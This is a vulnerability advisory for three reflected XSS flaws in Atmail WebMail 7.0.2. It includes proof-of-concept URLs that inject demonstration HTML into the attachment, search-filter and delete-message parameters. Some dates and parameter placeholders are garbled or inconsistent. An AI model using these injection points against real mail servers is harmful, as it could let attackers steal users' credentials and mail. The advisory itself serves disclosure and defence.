2013-014: Multiple reflected XSS vulnerabilities in Atmail WebMail

Original release date: March 25th, 2013
Last revised: March 25th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Scored)
CVE-ID: CVE-2013-6229

BACKGROUND

Atmail allows users to access IMAP Mailboxes of any server of your choice. The software provides a comprehensive email-suite for accessing user mailboxes, and provides an inbuilt Calendar and Addressbook features. The WebMail Client of Atmail supports any existing IMAP server running under Unix/Linux or Windows systems.

DESCRIPTION

Has been detected multiple reflected XSS vulnerability:
1) in the view attachment message process
2) in the search message with filter process
3) in the delete message process
These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT 

1) View attachment message process
       When a user opens a file attachment in an email, the link is as follows:

       http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/<file>

            where:
                -  is the Atmail WebMail server
                -  is the unique ID for the message that contains the attachment
                -  is the attachment file in the message

       A malicious user can inject arbitrary HTML/script code in the  parameter. For example:
       http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/test.txt
       <H1><marquee>This+is+an+XSS+example


2) Search message with filter process
       When a user search messages with a filter (for example, using the "Friends" filter), the link is as follows:

              POST

                 /index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchRes

                      ultsTab5 HTTP/1.1
                      Host: <atmail-server>
                      ...
                      searchQuery=&goBack=6&from=&to=&subject=&body=&filter=<filter>

                 where:
                      -  is the Atmail WebMail server
                      -  is the name of the selected filter by the user

A malicious user can inject arbitrary HTML/script code in the  parameter. Also, This POST HTTP Request can become a GET HTTP Request, making it easier to exploit
the vulnerability.
        For example:

                http://<atmail-server>/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=friends<H1><marquee>This +is+an+XSS+example


3) Delete message process When a user select and delete a message, the link is as follows:

        POST
               /index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash
                      HTTP/1.1Host:

                      <atmail-server>
                      ...
                          resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B

                          %5D=<MailID>&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen%5B15%5D=0&unseen%5B14%5D=0&unseen

                          %5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen%5B9%5D=0&unseen%5B8%5D=0&unseen

                          %5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen%5B2%5D=0&unseen%5B1%5D=0

              where:
                      -  is the Atmail WebMail server
                      -  is the identifier (number) of the mail selected by the user

    A malicious user can inject arbitrary HTML/script code in the  parameter. Also, This POST HTTP Request can become a GET HTTP Request, making it easier to exploit the vulnerability.
    For example:

                  http://<atmail-server>/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?

                  resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B

                  %5D=<H1><marquee>This+is+an+XSS+example&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen

                  %5B15%5D=0&unseen%5B14%5D=0&unseen%5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen

                  %5B9%5D=0&unseen%5B8%5D=0&unseen%5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen

                  %5B2%5D=0&unseen%5B1%5D=0

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

Tested in Atmail 7.0.2. Other versions may be affected too.

SOLUTION

-

REVISION HISTORY

March 9, 2013: Initial release
March 22, 2013: Last revision

DISCLOSURE TIMELINE

  • March 9, 2013: Discovered by Internet Security Auditors.
  • March 22, 2013: Advisory updated with new XSS vulnerable resources.
  • October 08, 2013: Firt contact with developer team.
  • October 16, 2013: Second contact with developer team.
  • November 28, 2013: Third contact with developer team.
  • January 10, 2014: Last contact and release.

REFERENCES

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.